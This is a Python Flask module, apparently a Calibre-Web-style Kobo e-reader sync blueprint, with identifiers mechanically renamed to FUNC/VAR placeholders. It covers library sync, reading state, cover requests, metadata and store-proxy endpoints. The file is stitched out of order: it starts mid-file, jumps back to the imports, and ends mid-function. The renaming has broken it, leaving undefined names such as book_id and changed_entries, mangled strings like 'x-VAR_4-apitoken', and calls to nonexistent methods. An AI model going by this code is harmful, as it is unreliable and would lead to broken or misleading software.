def FUNC_25(VAR_19):
VAR_54 = {
None: "ReadyToRead",
ub.ReadBook.STATUS_UNREAD: "ReadyToRead",
ub.ReadBook.STATUS_FINISHED: "Finished",
ub.ReadBook.STATUS_IN_PROGRESS: "Reading",
}
return VAR_54[VAR_19.read_status]
def FUNC_26(VAR_20):
VAR_55 = {
None: None,
"ReadyToRead": ub.ReadBook.STATUS_UNREAD,
"Finished": ub.ReadBook.STATUS_FINISHED,
"Reading": ub.ReadBook.STATUS_IN_PROGRESS,
}
return VAR_55[VAR_20]
def FUNC_27(VAR_21):
VAR_56 = ub.KoboSyncedBooks()
VAR_56.user_id = current_user.id
VAR_56.book_id = VAR_21
ub.session.add(VAR_56)
try:
ub.session.commit()
except Exception:
ub.session.rollback()
def FUNC_28(VAR_21):
VAR_23 = ub.session.query(ub.ReadBook).filter(ub.ReadBook.book_id == VAR_21,
ub.ReadBook.user_id == current_user.id).one_or_none()
if not VAR_23:
book_read = ub.ReadBook(user_id=current_user.id, VAR_21=book_id)
if not VAR_23.kobo_reading_state:
VAR_22 = ub.KoboReadingState(user_id=VAR_23.user_id, VAR_21=book_id)
VAR_22.current_bookmark = ub.KoboBookmark()
VAR_22.statistics = ub.KoboStatistics()
VAR_23.kobo_reading_state = VAR_22
ub.session.add(VAR_23)
ub.session_commit()
return VAR_23.kobo_reading_state
def FUNC_29(VAR_12, VAR_22):
return {
"EntitlementId": VAR_12.uuid,
"Created": FUNC_4(VAR_12.timestamp),
"LastModified": FUNC_4(VAR_22.last_modified),
"PriorityTimestamp": FUNC_4(VAR_22.priority_timestamp),
"StatusInfo": FUNC_30(VAR_22.book_read_link),
"Statistics": FUNC_31(VAR_22.statistics),
"CurrentBookmark": FUNC_32(VAR_22.current_bookmark),
}
def FUNC_30(VAR_23):
VAR_57 = {
"LastModified": FUNC_4(VAR_23.last_modified),
"Status": FUNC_25(VAR_23),
"TimesStartedReading": VAR_23.times_started_reading,
}
if VAR_23.last_time_started_reading:
VAR_57["LastTimeStartedReading"] = FUNC_4(VAR_23.last_time_started_reading)
return VAR_57
def FUNC_31(VAR_24):
VAR_57 = {
"LastModified": FUNC_4(VAR_24.last_modified),
}
if VAR_24.spent_reading_minutes:
VAR_57["SpentReadingMinutes"] = VAR_24.spent_reading_minutes
if VAR_24.remaining_time_minutes:
VAR_57["RemainingTimeMinutes"] = VAR_24.remaining_time_minutes
return VAR_57
def FUNC_32(VAR_25):
VAR_57 = {
"LastModified": FUNC_4(VAR_25.last_modified),
}
if VAR_25.progress_percent:
VAR_57["ProgressPercent"] = VAR_25.progress_percent
if VAR_25.content_source_progress_percent:
VAR_57["ContentSourceProgressPercent"] = VAR_25.content_source_progress_percent
if VAR_25.location_value:
VAR_57["Location"] = {
"Value": VAR_25.location_value,
"Type": VAR_25.location_type,
"Source": VAR_25.location_source,
}
return VAR_57
@VAR_4.route("/<VAR_11>/<VAR_26>/<VAR_27>/<VAR_29>/image.jpg", defaults={'Quality': ""})
@VAR_4.route("/<VAR_11>/<VAR_26>/<VAR_27>/<VAR_28>/<VAR_29>/image.jpg")
@requires_kobo_auth
def FUNC_33(VAR_11, VAR_26, VAR_27,VAR_28, VAR_29):
VAR_58 = helper.get_book_cover_with_uuid(
VAR_11, use_generic_cover_on_failure=False
)
if not VAR_58:
if config.config_kobo_proxy:
VAR_5.debug("Cover for unknown VAR_12: %s proxied to kobo" % VAR_11)
return redirect(VAR_2 +
"/{VAR_11}/{VAR_26}/{VAR_27}/false/image.jpg".format(VAR_11=book_uuid,
VAR_26=width,
VAR_27=height), 307)
else:
VAR_5.debug("Cover for unknown VAR_12: %s requested" % VAR_11)
return make_response(jsonify({}))
VAR_5.debug("Cover request received for VAR_12 %s" % VAR_11)
return VAR_58
@VAR_4.route("")
def FUNC_34():
return make_response(jsonify({}))
@VAR_4.route("/v1/library/<VAR_11>", methods=["DELETE"])
@requires_kobo_auth
def FUNC_35(VAR_11):
VAR_5.info("Kobo VAR_12 deletion request received for VAR_12 %s" % VAR_11)
VAR_12 = calibre_db.get_book_by_uuid(VAR_11)
if not VAR_12:
VAR_5.info(u"Book %s not found in database", VAR_11)
return FUNC_3()
VAR_21 = VAR_12.id
VAR_59 = (
ub.session.query(ub.ArchivedBook)
.filter(ub.ArchivedBook.book_id == VAR_21)
.first()
)
if not VAR_59:
archived_book = ub.ArchivedBook(user_id=current_user.id, VAR_21=book_id)
VAR_59.is_archived = True
VAR_59.last_modified = datetime.datetime.utcnow()
ub.session.merge(VAR_59)
ub.session_commit()
return ("", 204)
@VAR_4.route("/v1/library/<VAR_30>", methods=["DELETE", "GET"])
def FUNC_36(VAR_30=None):
VAR_5.debug("Unimplemented Library Request received: %s", request.base_url)
return FUNC_3()
@VAR_4.route("/v1/user/loyalty/<VAR_30>", methods=["GET", "POST"])
@VAR_4.route("/v1/user/profile", methods=["GET", "POST"])
@VAR_4.route("/v1/user/wishlist", methods=["GET", "POST"])
@VAR_4.route("/v1/user/recommendations", methods=["GET", "POST"])
@VAR_4.route("/v1/analytics/<VAR_30>", methods=["GET", "POST"])
def FUNC_37(VAR_30=None):
VAR_5.debug("Unimplemented User Request received: %s", request.base_url)
return FUNC_3()
@VAR_4.route("/v1/products/<VAR_30>/prices", methods=["GET", "POST"])
@VAR_4.route("/v1/products/<VAR_30>/recommendations", methods=["GET", "POST"])
@VAR_4.route("/v1/products/<VAR_30>/nextread", methods=["GET", "POST"])
@VAR_4.route("/v1/products/<VAR_30>/reviews", methods=["GET", "POST"])
@VAR_4.route("/v1/products/VAR_65/external/<VAR_30>", methods=["GET", "POST"])
@VAR_4.route("/v1/products/VAR_65/series/<VAR_30>", methods=["GET", "POST"])
@VAR_4.route("/v1/products/VAR_65/<VAR_30>", methods=["GET", "POST"])
@VAR_4.route("/v1/products/dailydeal", methods=["GET", "POST"])
@VAR_4.route("/v1/products", methods=["GET", "POST"])
def FUNC_38(VAR_30=None):
VAR_5.debug("Unimplemented Products Request received: %s", request.base_url)
return FUNC_3()
def FUNC_39():
VAR_60 = request.get_json()
VAR_61 = base64.b64encode(os.urandom(24)).decode('utf-8')
VAR_62 = base64.b64encode(os.urandom(24)).decode('utf-8')
return make_response(
jsonify(
{
"AccessToken": VAR_61,
"RefreshToken": VAR_62,
"TokenType": "Bearer",
"TrackingId": str(uuid.uuid4()),
"UserKey": VAR_60['UserKey'],
}
)
)
@VAR_4.route("/v1/auth/device", methods=["POST"])
@requires_kobo_auth
def FUNC_40():
VAR_5.debug('Kobo Auth request')
if config.config_kobo_proxy:
try:
return FUNC_3()
except Exception:
VAR_5.error("Failed to receive or parse VAR_44 from Kobo's auth endpoint. Falling back to un-proxied mode.")
return FUNC_39()
@VAR_4.route("/v1/initialization")
@requires_kobo_auth
def FUNC_41():
VAR_5.info('Init')
VAR_63 = None
if config.config_kobo_proxy:
try:
VAR_35 = FUNC_2()
VAR_86 = VAR_35.json()
if "Resources" in VAR_86:
VAR_63 = VAR_86["Resources"]
except Exception:
VAR_5.error("Failed to receive or parse VAR_44 from Kobo's init endpoint. Falling back to un-proxied mode.")
if not VAR_63:
kobo_resources = FUNC_43()
if not current_app.wsgi_app.is_proxied:
VAR_5.debug('Kobo: Received unproxied request, changed request port to external server port')
if ':' in request.host and not request.host.endswith(']'):
VAR_80 = "".join(request.host.split(':')[:-1])
else:
VAR_80 = request.host
VAR_77 = "{url_scheme}://{url_base}:{url_port}".format(
url_scheme=request.scheme,
url_base=VAR_80,
url_port=config.config_external_port
)
VAR_5.debug('Kobo: Received unproxied request, changed request url to %s', VAR_77)
VAR_63["image_host"] = VAR_77
VAR_63["image_url_quality_template"] = unquote(VAR_77 +
url_for("kobo.HandleCoverImageRequest",
auth_token=kobo_auth.get_auth_token(),
VAR_11="{ImageId}",
VAR_26="{VAR_26}",
VAR_27="{VAR_27}",
VAR_28='{VAR_28}',
VAR_29='isGreyscale'))
VAR_63["image_url_template"] = unquote(VAR_77 +
url_for("kobo.HandleCoverImageRequest",
auth_token=kobo_auth.get_auth_token(),
VAR_11="{ImageId}",
VAR_26="{VAR_26}",
VAR_27="{VAR_27}",
VAR_29='false'))
else:
VAR_63["image_host"] = url_for("web.index", _external=True).strip("/")
VAR_63["image_url_quality_template"] = unquote(url_for("kobo.HandleCoverImageRequest",
auth_token=kobo_auth.get_auth_token(),
VAR_11="{ImageId}",
VAR_26="{VAR_26}",
VAR_27="{VAR_27}",
VAR_28='{VAR_28}',
VAR_29='isGreyscale',
_external=True))
VAR_63["image_url_template"] = unquote(url_for("kobo.HandleCoverImageRequest",
auth_token=kobo_auth.get_auth_token(),
VAR_11="{ImageId}",
VAR_26="{VAR_26}",
VAR_27="{VAR_27}",
VAR_29='false',
_external=True))
VAR_44 = make_response(jsonify({"Resources": VAR_63}))
VAR_44.headers["x-VAR_4-apitoken"] = "e30="
return VAR_44
@VAR_4.route("/download/<VAR_21>/<VAR_13>")
@requires_kobo_auth
@download_required
def FUNC_42(VAR_21, VAR_13):
return get_download_link(VAR_21, VAR_13, "kobo")
def FUNC_43():
return {
"account_page": "https://secure.kobobooks.com/profile",
"account_page_rakuten": "https://my.rakuten.co.jp/",
"add_entitlement": "https://storeapi.kobo.com/v1/library/{RevisionIds}",
"affiliaterequest": "https://storeapi.kobo.com/v1/affiliate",
"audiobook_subscription_orange_deal_inclusion_url": "https://authorize.kobo.com/inclusion",
"authorproduct_recommendations": "https://storeapi.kobo.com/v1/products/VAR_65/authors/recommendations",
"autocomplete": "https://storeapi.kobo.com/v1/products/autocomplete",
"blackstone_header": {"key": "x-amz-request-payer", "value": "requester"},
"book": "https://storeapi.kobo.com/v1/products/VAR_65/{ProductId}",
"book_detail_page": "https://store.kobobooks.com/{culture}/ebook/{slug}",
"book_detail_page_rakuten": "https://VAR_65.rakuten.co.jp/rk/{crossrevisionid}",
"book_landing_page": "https://store.kobobooks.com/ebooks",
"book_subscription": "https://storeapi.kobo.com/v1/products/VAR_65/subscriptions",
"categories": "https://storeapi.kobo.com/v1/categories",
"categories_page": "https://store.kobobooks.com/ebooks/categories",
"category": "https://storeapi.kobo.com/v1/categories/{CategoryId}",
"category_featured_lists": "https://storeapi.kobo.com/v1/categories/{CategoryId}/featured",
"category_products": "https://storeapi.kobo.com/v1/categories/{CategoryId}/products",
"checkout_borrowed_book": "https://storeapi.kobo.com/v1/library/borrow",
"configuration_data": "https://storeapi.kobo.com/v1/configuration",
"content_access_book": "https://storeapi.kobo.com/v1/products/VAR_65/{ProductId}/access",
"customer_care_live_chat": "https://v2.zopim.com/widget/livechat.html?key=Y6gwUmnu4OATxN3Tli4Av9bYN319BTdO",
"daily_deal": "https://storeapi.kobo.com/v1/products/dailydeal",
"deals": "https://storeapi.kobo.com/v1/deals",
"delete_entitlement": "https://storeapi.kobo.com/v1/library/{Ids}",
"delete_tag": "https://storeapi.kobo.com/v1/library/tags/{TagId}",
"delete_tag_items": "https://storeapi.kobo.com/v1/library/tags/{TagId}/VAR_16/delete",
"device_auth": "https://storeapi.kobo.com/v1/auth/device",
"device_refresh": "https://storeapi.kobo.com/v1/auth/refresh",
"dictionary_host": "https://kbdownload1-a.akamaihd.net",
"discovery_host": "https://discovery.kobobooks.com",
"eula_page": "https://www.kobo.com/termsofuse?style=onestore",
"exchange_auth": "https://storeapi.kobo.com/v1/auth/exchange",
"external_book": "https://storeapi.kobo.com/v1/products/VAR_65/external/{Ids}",
"facebook_sso_page": "https://authorize.kobo.com/signin/provider/Facebook/login?returnUrl=http://store.kobobooks.com/",
"featured_list": "https://storeapi.kobo.com/v1/products/featured/{FeaturedListId}",
"featured_lists": "https://storeapi.kobo.com/v1/products/featured",
"free_books_page": {
"EN": "https://www.kobo.com/{region}/{language}/p/free-ebooks",
"FR": "https://www.kobo.com/{region}/{language}/p/livres-gratuits",
"IT": "https://www.kobo.com/{region}/{language}/p/libri-gratuiti",
"NL": "https://www.kobo.com/{region}/{language}/List/bekijk-het-overzicht-van-gratis-ebooks/QpkkVWnUw8sxmgjSlCbJRg",
"PT": "https://www.kobo.com/{region}/{language}/p/livros-gratis",
},
"fte_feedback": "https://storeapi.kobo.com/v1/products/ftefeedback",
"get_tests_request": "https://storeapi.kobo.com/v1/analytics/gettests",
"giftcard_epd_redeem_url": "https://www.kobo.com/{storefront}/{language}/redeem-ereader",
"giftcard_redeem_url": "https://www.kobo.com/{storefront}/{language}/redeem",
"help_page": "https://www.kobo.com/help",
"kobo_audiobooks_enabled": "False",
"kobo_audiobooks_orange_deal_enabled": "False",
"kobo_audiobooks_subscriptions_enabled": "False",
"kobo_nativeborrow_enabled": "True",
"kobo_onestorelibrary_enabled": "False",
"kobo_redeem_enabled": "True",
"kobo_shelfie_enabled": "False",
"kobo_subscriptions_enabled": "False",
"kobo_superpoints_enabled": "False",
"kobo_wishlist_enabled": "True",
"library_book": "https://storeapi.kobo.com/v1/user/library/VAR_65/{LibraryItemId}",
"library_items": "https://storeapi.kobo.com/v1/user/library",
"library_metadata": "https://storeapi.kobo.com/v1/library/{Ids}/metadata",
"library_prices": "https://storeapi.kobo.com/v1/user/library/previews/prices",
"library_stack": "https://storeapi.kobo.com/v1/user/library/stacks/{LibraryItemId}",
"library_sync": "https://storeapi.kobo.com/v1/library/sync",
"love_dashboard_page": "https://store.kobobooks.com/{culture}/kobosuperpoints",
"love_points_redemption_page": "https://store.kobobooks.com/{culture}/KoboSuperPointsRedemption?productId={ProductId}",
"magazine_landing_page": "https://store.kobobooks.com/emagazines",
"notifications_registration_issue": "https://storeapi.kobo.com/v1/notifications/registration",
"oauth_host": "https://oauth.kobo.com",
"overdrive_account": "https://auth.overdrive.com/account",
"overdrive_library": "https://{libraryKey}.auth.overdrive.com/library",
"overdrive_library_finder_host": "https://libraryfinder.api.overdrive.com",
"overdrive_thunder_host": "https://thunder.api.overdrive.com",
"password_retrieval_page": "https://www.kobobooks.com/passwordretrieval.html",
"post_analytics_event": "https://storeapi.kobo.com/v1/analytics/event",
"privacy_page": "https://www.kobo.com/privacypolicy?style=onestore",
"product_nextread": "https://storeapi.kobo.com/v1/products/{ProductIds}/nextread",
"product_prices": "https://storeapi.kobo.com/v1/products/{ProductIds}/prices",
"product_recommendations": "https://storeapi.kobo.com/v1/products/{ProductId}/recommendations",
"product_reviews": "https://storeapi.kobo.com/v1/products/{ProductIds}/reviews",
"products": "https://storeapi.kobo.com/v1/products",
"provider_external_sign_in_page": "https://authorize.kobo.com/ExternalSignIn/{providerName}?returnUrl=http://store.kobobooks.com/",
"purchase_buy": "https://www.kobo.com/checkout/createpurchase/",
"purchase_buy_templated": "https://www.kobo.com/{culture}/checkout/createpurchase/{ProductId}",
"quickbuy_checkout": "https://storeapi.kobo.com/v1/store/quickbuy/{PurchaseId}/checkout",
"quickbuy_create": "https://storeapi.kobo.com/v1/store/quickbuy/purchase",
"rating": "https://storeapi.kobo.com/v1/products/{ProductId}/rating/{Rating}",
"reading_state": "https://storeapi.kobo.com/v1/library/{Ids}/state",
"redeem_interstitial_page": "https://store.kobobooks.com",
"registration_page": "https://authorize.kobo.com/signup?returnUrl=http://store.kobobooks.com/",
"related_items": "https://storeapi.kobo.com/v1/products/{Id}/related",
"remaining_book_series": "https://storeapi.kobo.com/v1/products/VAR_65/series/{SeriesId}",
"rename_tag": "https://storeapi.kobo.com/v1/library/tags/{TagId}",
"review": "https://storeapi.kobo.com/v1/products/reviews/{ReviewId}",
"review_sentiment": "https://storeapi.kobo.com/v1/products/reviews/{ReviewId}/sentiment/{Sentiment}",
"shelfie_recommendations": "https://storeapi.kobo.com/v1/user/recommendations/shelfie",
"sign_in_page": "https://authorize.kobo.com/signin?returnUrl=http://store.kobobooks.com/",
"social_authorization_host": "https://social.kobobooks.com:8443",
"social_host": "https://social.kobobooks.com",
"stacks_host_productId": "https://store.kobobooks.com/collections/byproductid/",
"store_home": "www.kobo.com/{region}/{language}",
"store_host": "store.kobobooks.com",
"store_newreleases": "https://store.kobobooks.com/{culture}/List/new-releases/961XUjtsU0qxkFItWOutGA",
"store_search": "https://store.kobobooks.com/{culture}/Search?Query={query}",
"store_top50": "https://store.kobobooks.com/{culture}/ebooks/Top",
"tag_items": "https://storeapi.kobo.com/v1/library/tags/{TagId}/Items",
"tags": "https://storeapi.kobo.com/v1/library/tags",
"taste_profile": "https://storeapi.kobo.com/v1/products/tasteprofile",
"update_accessibility_to_preview": "https://storeapi.kobo.com/v1/library/{EntitlementIds}/preview",
"use_one_store": "False",
"user_loyalty_benefits": "https://storeapi.kobo.com/v1/user/loyalty/benefits",
"user_platform": "https://storeapi.kobo.com/v1/user/platform",
"user_profile": "https://storeapi.kobo.com/v1/user/profile",
"user_ratings": "https://storeapi.kobo.com/v1/user/ratings",
"user_recommendations": "https://storeapi.kobo.com/v1/user/recommendations",
"user_reviews": "https://storeapi.kobo.com/v1/user/reviews",
"user_wishlist": "https://storeapi.kobo.com/v1/user/wishlist",
"userguide_host": "https://kbdownload1-a.akamaihd.net",
"wishlist_page": "https://store.kobobooks.com/{region}/{language}/account/wishlist",
}
|
import base64
import datetime
import sys
import os
import uuid
from time import gmtime, strftime
try:
from urllib import unquote
except ImportError:
from urllib.parse import unquote
from flask import (
Blueprint,
request,
make_response,
jsonify,
current_app,
url_for,
redirect,
abort
)
from flask_login import current_user
from werkzeug.datastructures import Headers
from sqlalchemy import func
from sqlalchemy.sql.expression import and_, or_
from sqlalchemy.exc import StatementError
from sqlalchemy.sql import select
import requests
from . import config, logger, kobo_auth, db, calibre_db, helper, VAR_17 as shelf_lib, ub, csrf
from .constants import sqlalchemy_version2
from .helper import get_download_link
from .services import SyncToken as SyncToken
from .web import download_required
from .kobo_auth import requires_kobo_auth, get_auth_token
VAR_0 = {"KEPUB": ["KEPUB"], "EPUB": ["EPUB3", "EPUB"]}
VAR_1 = "https://storeapi.kobo.com"
VAR_2 = "https://kbimages1-a.akamaihd.net"
VAR_3 = 100
VAR_4 = Blueprint("kobo", __name__, url_prefix="/VAR_4/<auth_token>")
kobo_auth.disable_failed_auth_redirect_for_blueprint(VAR_4)
kobo_auth.register_url_value_preprocessor(VAR_4)
VAR_5 = logger.create()
def FUNC_0():
VAR_31, __, VAR_32 = request.full_path.rpartition("/VAR_4/")
VAR_31, __, VAR_33 = VAR_32.rstrip("?").partition(
"/"
)
return VAR_1 + "/" + VAR_33
VAR_6 = [
"connection",
"content-encoding",
"content-length",
"transfer-encoding",
]
def FUNC_1():
return config.config_kobo_sync
def FUNC_2(VAR_7=None):
VAR_34 = Headers(request.headers)
VAR_34.remove("Host")
if VAR_7:
VAR_7.set_kobo_store_header(VAR_34)
VAR_35 = requests.request(
method=request.method,
url=FUNC_0(),
headers=VAR_34,
data=request.get_data(),
allow_redirects=False,
timeout=(2, 10)
)
return VAR_35
def FUNC_3():
if config.config_kobo_proxy:
if request.method == "GET":
return redirect(FUNC_0(), 307)
else:
VAR_35 = FUNC_2()
VAR_78 = VAR_35.headers
for header_key in VAR_6:
VAR_78.pop(header_key, default=None)
return make_response(
VAR_35.content, VAR_35.status_code, VAR_78.items()
)
else:
return make_response(jsonify({}))
def FUNC_4(VAR_8):
try:
return VAR_8.strftime("%Y-%m-%dT%H:%M:%SZ")
except AttributeError as exc:
VAR_5.debug("Timestamp not valid: {}".format(exc))
return datetime.datetime.now().strftime("%Y-%m-%dT%H:%M:%SZ")
@VAR_4.route("/v1/library/sync")
@requires_kobo_auth
@download_required
def FUNC_5():
VAR_7 = SyncToken.SyncToken.from_headers(request.headers)
VAR_5.info("Kobo library sync request received.")
VAR_5.debug("SyncToken: {}".format(VAR_7))
if not current_app.wsgi_app.is_proxied:
VAR_5.debug('Kobo: Received unproxied request, changed request port to external server port')
VAR_36 = VAR_7.books_last_modified
VAR_37 = VAR_7.books_last_created
VAR_38 = VAR_7.reading_state_last_modified
VAR_39 = datetime.datetime.min
VAR_9 = []
calibre_db.reconnect_db(config, ub.app_DB_path)
VAR_18 = current_user.kobo_only_shelves_sync
if VAR_18:
if sqlalchemy_version2:
VAR_64 = select(db.Books,
ub.ArchivedBook.last_modified,
ub.BookShelf.date_added,
ub.ArchivedBook.is_archived)
else:
VAR_64 = calibre_db.session.query(db.Books,
ub.ArchivedBook.last_modified,
ub.BookShelf.date_added,
ub.ArchivedBook.is_archived)
VAR_64 = (changed_entries
.join(db.Data).outerjoin(ub.ArchivedBook, db.Books.id == ub.ArchivedBook.book_id)
.join(ub.KoboSyncedBooks, ub.KoboSyncedBooks.book_id == db.Books.id, isouter=True)
.filter(or_(ub.KoboSyncedBooks.user_id != current_user.id,
ub.KoboSyncedBooks.book_id == None))
.filter(ub.BookShelf.date_added > VAR_7.books_last_modified) #?? or also or from above
.filter(db.Data.format.in_(VAR_0))
.filter(calibre_db.common_filters())
.order_by(db.Books.id)
.order_by(ub.ArchivedBook.last_modified)
.join(ub.BookShelf, db.Books.id == ub.BookShelf.book_id)
.join(ub.Shelf)
.filter(ub.Shelf.user_id == current_user.id)
.filter(ub.Shelf.kobo_sync)
.distinct()
)
else:
if sqlalchemy_version2:
VAR_64 = select(db.Books, ub.ArchivedBook.last_modified, ub.ArchivedBook.is_archived)
else:
VAR_64 = calibre_db.session.query(db.Books,
ub.ArchivedBook.last_modified,
ub.ArchivedBook.is_archived)
VAR_64 = (changed_entries
.join(db.Data).outerjoin(ub.ArchivedBook, db.Books.id == ub.ArchivedBook.book_id)
.join(ub.KoboSyncedBooks, ub.KoboSyncedBooks.book_id == db.Books.id, isouter=True)
.filter(or_(ub.KoboSyncedBooks.user_id != current_user.id,
ub.KoboSyncedBooks.book_id == None))
.filter(calibre_db.common_filters())
.filter(db.Data.format.in_(VAR_0))
.order_by(db.Books.last_modified)
.order_by(db.Books.id)
)
VAR_40 = []
if sqlalchemy_version2:
VAR_65 = calibre_db.session.execute(VAR_64.limit(VAR_3))
else:
VAR_65 = VAR_64.limit(VAR_3)
for VAR_12 in VAR_65:
FUNC_27(VAR_12.Books.id)
VAR_66 = [data.format for data in VAR_12.Books.data]
if not 'KEPUB' in VAR_66 and config.config_kepubifypath and 'EPUB' in VAR_66:
helper.convert_book_format(VAR_12.Books.id, config.config_calibre_dir, 'EPUB', 'KEPUB', current_user.name)
VAR_22 = FUNC_28(VAR_12.Books.id)
VAR_67 = {
"BookEntitlement": FUNC_9(VAR_12.Books, VAR_14=(VAR_12.is_archived == True)),
"BookMetadata": FUNC_16(VAR_12.Books),
}
if VAR_22.last_modified > VAR_7.reading_state_last_modified:
VAR_67["ReadingState"] = FUNC_29(VAR_12.Books, VAR_22)
VAR_38 = max(VAR_38, VAR_22.last_modified)
VAR_40.append(VAR_12.Books.id)
VAR_68 = VAR_12.Books.timestamp
try:
VAR_68 = max(VAR_68, VAR_12.date_added)
except AttributeError:
pass
if VAR_68 > VAR_7.books_last_created:
VAR_9.append({"NewEntitlement": VAR_67})
else:
VAR_9.append({"ChangedEntitlement": VAR_67})
VAR_36 = max(
VAR_12.Books.last_modified, VAR_36
)
try:
VAR_36 = max(
VAR_36, VAR_12.date_added
)
except AttributeError:
pass
VAR_37 = max(VAR_68, VAR_37)
if sqlalchemy_version2:
VAR_41 = calibre_db.session.execute(VAR_64
.filter(ub.ArchivedBook.is_archived)
.order_by(func.datetime(ub.ArchivedBook.last_modified).desc()))\
.columns(db.Books).first()
else:
VAR_41 = VAR_64.from_self().filter(ub.ArchivedBook.is_archived) \
.order_by(func.datetime(ub.ArchivedBook.last_modified).desc()).first()
VAR_41 = max_change.last_modified if VAR_41 else VAR_39
VAR_39 = max(VAR_39, VAR_41)
if sqlalchemy_version2:
VAR_69 = calibre_db.session.execute(VAR_64).all()
VAR_70 = len(VAR_69)
else:
VAR_70 = VAR_64.count()
VAR_5.debug("Remaining VAR_65 to Sync: {}".format(VAR_70))
VAR_42 = ub.session.query(ub.KoboReadingState)
if VAR_18:
VAR_42 = VAR_42.join(ub.BookShelf,
ub.KoboReadingState.book_id == ub.BookShelf.book_id)\
.join(ub.Shelf)\
.filter(current_user.id == ub.Shelf.user_id)\
.filter(ub.Shelf.kobo_sync,
or_(
func.datetime(ub.KoboReadingState.last_modified) > VAR_7.reading_state_last_modified,
func.datetime(ub.BookShelf.date_added) > VAR_7.books_last_modified
)).distinct()
else:
VAR_42 = VAR_42.filter(
func.datetime(ub.KoboReadingState.last_modified) > VAR_7.reading_state_last_modified)
VAR_42 = VAR_42.filter(
and_(ub.KoboReadingState.user_id == current_user.id,
ub.KoboReadingState.book_id.notin_(VAR_40)))
for VAR_22 in VAR_42.all():
VAR_12 = calibre_db.session.query(db.Books).filter(db.Books.id == VAR_22.book_id).one_or_none()
if VAR_12:
VAR_9.append({
"ChangedReadingState": {
"ReadingState": FUNC_29(VAR_12, VAR_22)
}
})
VAR_38 = max(VAR_38, VAR_22.last_modified)
FUNC_22(VAR_7, VAR_9, VAR_18)
VAR_7.books_last_created = VAR_37
VAR_7.books_last_modified = VAR_36
VAR_7.archive_last_modified = VAR_39
VAR_7.reading_state_last_modified = VAR_38
return FUNC_6(VAR_7, VAR_9, VAR_70)
def FUNC_6(VAR_7, VAR_9, VAR_10=False):
VAR_43 = {}
if config.config_kobo_proxy:
try:
VAR_35 = FUNC_2(VAR_7)
VAR_79 = VAR_35.json()
VAR_9 += VAR_79
VAR_7.merge_from_store_response(VAR_35)
VAR_43["x-VAR_4-sync"] = VAR_35.headers.get("x-VAR_4-sync")
VAR_43["x-VAR_4-sync-mode"] = VAR_35.headers.get("x-VAR_4-sync-mode")
VAR_43["x-VAR_4-recent-reads"] = VAR_35.headers.get("x-VAR_4-recent-reads")
except Exception as ex:
VAR_5.error("Failed to receive or parse VAR_44 from Kobo's sync endpoint: {}".format(ex))
if VAR_10:
VAR_43["x-VAR_4-sync"] = "continue"
VAR_7.to_headers(VAR_43)
VAR_44 = make_response(jsonify(VAR_9), VAR_43)
return VAR_44
@VAR_4.route("/v1/library/<VAR_11>/metadata")
@requires_kobo_auth
@download_required
def FUNC_7(VAR_11):
if not current_app.wsgi_app.is_proxied:
VAR_5.debug('Kobo: Received unproxied request, changed request port to external server port')
VAR_5.info("Kobo library VAR_45 request received for VAR_12 %s" % VAR_11)
VAR_12 = calibre_db.get_book_by_uuid(VAR_11)
if not VAR_12 or not VAR_12.data:
VAR_5.info(u"Book %s not found in database", VAR_11)
return FUNC_3()
VAR_45 = FUNC_16(VAR_12)
return jsonify([VAR_45])
def FUNC_8(VAR_12, VAR_13):
if not current_app.wsgi_app.is_proxied:
if ':' in request.host and not request.host.endswith(']'):
VAR_80 = "".join(request.host.split(':')[:-1])
else:
VAR_80 = request.host
return "{url_scheme}://{url_base}:{url_port}/VAR_4/{auth_token}/download/{VAR_21}/{VAR_13}".format(
url_scheme=request.scheme,
url_base=VAR_80,
url_port=config.config_external_port,
auth_token=get_auth_token(),
VAR_21=VAR_12.id,
VAR_13=book_format.lower()
)
return url_for(
"kobo.download_book",
auth_token=kobo_auth.get_auth_token(),
VAR_21=VAR_12.id,
VAR_13=book_format.lower(),
_external=True,
)
def FUNC_9(VAR_12, VAR_14):
VAR_11 = VAR_12.uuid
return {
"Accessibility": "Full",
"ActivePeriod": {"From": FUNC_4(datetime.datetime.now())},
"Created": FUNC_4(VAR_12.timestamp),
"CrossRevisionId": VAR_11,
"Id": VAR_11,
"IsRemoved": VAR_14,
"IsHiddenFromArchive": False,
"IsLocked": False,
"LastModified": FUNC_4(VAR_12.last_modified),
"OriginCategory": "Imported",
"RevisionId": VAR_11,
"Status": "Active",
}
def FUNC_10():
return strftime("%Y-%m-%dT%H:%M:%SZ", gmtime())
def FUNC_11(VAR_12):
if not VAR_12.comments:
return None
return VAR_12.comments[0].text
def FUNC_12(VAR_12):
if not VAR_12.authors:
return {"Contributors": None}
if len(VAR_12.authors) > 1:
VAR_71 = []
VAR_72 = []
for author in VAR_12.authors:
VAR_72.append({"Name":author.name, "Role":"Author"})
VAR_71.append(author.name)
return {"ContributorRoles": VAR_72, "Contributors":VAR_71}
return {"ContributorRoles": [{"Name":VAR_12.authors[0].name, "Role":"Author"}], "Contributors": VAR_12.authors[0].name}
def FUNC_13(VAR_12):
if not VAR_12.publishers:
return None
return VAR_12.publishers[0].name
def FUNC_14(VAR_12):
if not VAR_12.series:
return None
return VAR_12.series[0].name
def FUNC_15(VAR_12):
return VAR_12.series_index or 1
def FUNC_16(VAR_12):
VAR_46 = []
VAR_47 = [data for data in VAR_12.data if data.format == 'KEPUB']
for book_data in VAR_47 if len(VAR_47) > 0 else VAR_12.data:
if book_data.format not in VAR_0:
continue
for kobo_format in VAR_0[book_data.format]:
VAR_46.append(
{
"Format": kobo_format,
"Size": book_data.uncompressed_size,
"Url": FUNC_8(VAR_12, book_data.format),
"Platform": "Generic",
}
)
VAR_11 = VAR_12.uuid
VAR_45 = {
"Categories": ["00000000-0000-0000-0000-000000000001", ],
"CoverImageId": VAR_11,
"CrossRevisionId": VAR_11,
"CurrentDisplayPrice": {"CurrencyCode": "USD", "TotalAmount": 0},
"CurrentLoveDisplayPrice": {"TotalAmount": 0},
"Description": FUNC_11(VAR_12),
"DownloadUrls": VAR_46,
"EntitlementId": VAR_11,
"ExternalIds": [],
"Genre": "00000000-0000-0000-0000-000000000001",
"IsEligibleForKoboLove": False,
"IsInternetArchive": False,
"IsPreOrder": False,
"IsSocialEnabled": True,
"Language": "en",
"PhoneticPronunciations": {},
"PublicationDate": VAR_12.pubdate,
"Publisher": {"Imprint": "", "Name": FUNC_13(VAR_12),},
"RevisionId": VAR_11,
"Title": VAR_12.title,
"WorkId": VAR_11,
}
VAR_45.update(FUNC_12(VAR_12))
if FUNC_14(VAR_12):
if sys.version_info < (3, 0):
VAR_48 = FUNC_14(VAR_12).encode("utf-8")
else:
VAR_48 = FUNC_14(VAR_12)
